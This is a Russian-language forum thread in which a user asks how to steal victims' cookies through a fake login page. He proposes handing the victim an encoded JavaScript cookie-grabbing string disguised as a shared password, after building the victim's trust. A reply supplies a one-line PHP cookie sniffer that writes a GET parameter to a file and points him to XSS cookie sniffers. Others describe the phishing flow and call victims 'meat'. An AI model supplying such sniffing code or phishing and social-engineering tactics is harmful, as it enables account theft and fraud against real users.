Сразу к вопросу:

Предположим есть пользователь, который 100% кликнет на фейковую страничку, где ему предолжено будет ввести данные. Причем данные, не что иное, как зашифрованная строка javascripta на хищение куков. Я просто плохо разбираюсь в php и javascript, но можно было сделать так, что при введении этой "ядовитой строки" в какое-либо поле, специально подготовленный скрипт считывал ее, получал куки пользователя , которвый ее ввел, и соответственно где-то это фиксировалось в файле?

Надеюсь, что вопрос корректный, и смысл понятен.. Кто сможет, ответьте , пожалуйста как можно подробно. Заранее спасибо!

типа Онлайн шоле?

<? file_put_contents('kyki.txt', $_GET[c]); ?>
а вообще гугли в сторону xss/cookie sniffer

Если правильно понял, тебе нужно чтобы после ввода "жертвой" логина и пасса(к примеру) в форму они сохранялись в файле!!!???

Если так, тогда именно этим 99% фейковых страничек и занимаются...

LEE_ROY, а что конкретно значит эта строка кода? Получает куки?

Если правильно понял, тебе нужно чтобы после ввода "жертвой" логина и пасса(к примеру) в форму они сохранялись в файле!!!???

Если так, тогда именно этим 99% фейковых страничек и занимаются...

Это верно все, но хотелось бы немного усоврешенстовать что ли... Согласитесь, что совсем невнимательные и глупенькие будут вводить логин и пароль на не известной странице. Поэтому я предлагаю зашифровать строку "javascript.document("cookie")" ( как то так) известной функцией в что-нибудь непонятное , скажем "dsd243sdfdfd23453454sdf" и выдать юзеру эту зашифрованную строку как за пасс, при этом скрипт получит ее, разшифрует (заметьте это не хэш! а просто известная простая функция), затем обработает и запишет печеньки в файл.
Получится , думаете такое сделать?!

Тебе зачем так всё усложнять??
Зашло мясо на фейк, ввело данные - данные улетели к тебе; мясо редиректнуло на нормальную страницу и все. Ты получаешь акк, мясо - заходит к себе. К чему шифрование какое-то???

Я согласен зачем же еще шифровать и усложнять себе жизнь мясо оно и есть мясо а умный человек и так поймет шо перед ним лажа и не полезет!

Тебе зачем так всё усложнять??
Зашло мясо на фейк, ввело данные - данные улетели к тебе; мясо редиректнуло на нормальную страницу и все. Ты получаешь акк, мясо - заходит к себе. К чему шифрование какое-то???

Мясо :D Мда....

Ну а усложнять понятно зачем, чтобы завоевать доверие у пользователя. Хотите сказать, что многие увидев фейковую ссылку сразу на нее клацают, и удивленно видя поля для ввода логина и пароля , вводят их?! Таких же не все, как Вы выражаетесь мясо. Даже девушки в этом разбираются, с бытсротой определяют где подвох.
А тут есть вероятность, что пользователь поверит. Ну смотрите сами, куда результативней сначала познакомится с жертвой выяснить ее интересы , затем дать ссылку при этом добавить, что-то вроде:
"Вот здесь, кстати тоже можно найти. Можешь под моим логином и паролем зайти, я тебе верю" И давать при этом логин: Vasya , а пароль: dfsdjhf232hfjh323f (зашифр строка для куков) . Держу пари, все равно попадется! :)

Ну ладно, зачем просвешать, может кто-нибудь просто подсказать как реализовывать, чисто на словах. Не заставляю писать за меня. Просто я не очень понимаю, в результате каких действий от пользователя скрипт получает куки? какой командой, и как их в файл сохранить. На сколько я понял LEE_ROY, пример твоей строки, ничего не делает кроме как перехвата куков?. Войдите в положение, просто я ноль в php :rolleyes: